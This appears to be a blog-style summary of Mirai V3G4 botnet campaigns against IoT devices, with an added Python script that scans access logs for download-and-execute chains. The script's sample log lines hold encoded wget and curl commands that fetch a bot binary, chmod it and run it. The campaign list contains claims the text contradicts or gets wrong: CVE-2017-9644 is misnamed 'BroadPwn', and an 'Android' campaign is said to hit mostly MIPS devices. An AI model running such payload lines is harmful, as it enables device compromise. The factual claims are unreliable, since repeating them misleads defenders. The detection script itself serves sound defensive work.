Since July 2022, researchers have observed three campaigns using the Mirai V3G4 variant. The threat actor exploited 13 vulnerabilities that can lead to remote code execution. After successful exploitation, the wget and curl utilities are invoked to download Mirai client samples from the malware infrastructure, and the downloaded bot clients are then executed.
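The download-and-execute stage described above (exploit, then wget or curl fetching the bot client, then running it) leaves a recognizable trace in web-server or device logs, because the injected command usually arrives inside a request parameter. The Python script below is an added example, not code from the original post or from the AlienVault report it summarizes: it parses constructed access-log lines and flags requests whose decoded parameters chain a downloader with a chmod or execute step. The log lines, IP addresses (documentation ranges), paths and file names are all constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines in combined format. The addresses come from
# documentation ranges and the paths are illustrative, not captures from a real incident.
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Sep/2022:17:31:02 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [04/Sep/2022:17:31:10 +0000] "GET /api/status?cmd=uptime HTTP/1.1" 200 88 "-" "curl/7.68.0"',
    '198.51.100.20 - - [04/Sep/2022:17:32:44 +0000] "POST /cgi-bin/admin.cgi?cmd=cd+%2Ftmp%3B+wget+http%3A%2F%2F198.51.100.77%2Fbins%2Fx.mips%3B+chmod+777+x.mips%3B+.%2Fx.mips HTTP/1.1" 200 0 "-" "Hello, world"',
    '198.51.100.21 - - [04/Sep/2022:17:33:01 +0000] "GET /setup.cgi?cmd=curl+-s+http%3A%2F%2F198.51.100.77%2Fbins%2Fx.arm+-o+%2Ftmp%2Fa%3B+sh+%2Ftmp%2Fa HTTP/1.1" 404 0 "-" "-"',
    '203.0.113.12 - - [04/Sep/2022:17:34:15 +0000] "GET /downloads?file=report.pdf HTTP/1.1" 200 52311 "-" "Mozilla/5.0"',
]

# Combined log format: ip ident user [timestamp] "METHOD uri PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# Stage 1 of the chain: a downloader fetching a remote file.
DOWNLOADER_RE = re.compile(r'\b(wget|curl|tftp)\b')
# Stage 2: making the fetched file executable and/or running it after a command separator.
EXEC_RE = re.compile(r'(chmod\s+(\+x|[0-7]{3,4})\b|(^|[;&|]\s*)(\./|sh\s+|/bin/sh\s+))')


def parse_line(line):
    """Parse one combined-format access-log line; return None for lines that don't match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def decode_uri(uri):
    """Percent-decode the URI twice so double-encoded payloads are also visible as shell text."""
    return unquote_plus(unquote_plus(uri))


def is_download_exec_chain(text):
    """True when the text contains both a downloader invocation and an execute step."""
    return bool(DOWNLOADER_RE.search(text)) and bool(EXEC_RE.search(text))


def scan(lines):
    """Return (source_ip, decoded_uri) for every request carrying a download-and-execute chain."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        decoded = decode_uri(rec["uri"])
        if is_download_exec_chain(decoded):
            findings.append((rec["ip"], decoded))
    return findings


if __name__ == "__main__":
    for ip, cmd in scan(SAMPLE_LOG):
        print(f"download-and-execute chain from {ip}: {cmd}")
```

Only the request URI is inspected, so a legitimate client identifying itself as curl in the User-Agent header (second sample line) is not flagged; what matters is a downloader followed by a chmod or execution step inside the parameters. Requiring both stages keeps noise down but is still a heuristic: tune the separator and execution patterns to the shells and parameter names your devices actually accept, and treat a hit as a reason to pull the device's process list and outbound connections rather than as proof by itself.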
The following are the attacks observed so far:
1. The most recent campaign began on September 4 at approximately 5:30 PM UTC. This operation targets devices with a MIPS-based architecture; 66% of the discovered IoT devices were MIPS-based. The vulnerability exploited is CVE-2017-9644, more commonly known as “BroadPwn”.
2. On August 15, a campaign targeting devices running Android 6.0 and higher began but was interrupted at around 10:45 PM UTC by a Mirai author, who temporarily suspended all activity while investigating an incident on the Mirai control panel server. The malware samples used in this incident were signed with the same hardcoded private RSA key as other Mirai samples. This campaign had the largest footprint: over 5,000 vulnerable IoT devices were found, almost all of them with a MIPS-based architecture.
3. On July 12-13, researchers observed a new attack campaign that appeared to be testing the Mirai codebase, with samples and payloads containing UTF-8 encoded characters. During this attack, the malware created a file containing a list of targets for subsequent attacks.
Source: Mirai Variant V3G4 Targets IoT Devices - AlienVault - Open Threat Exchange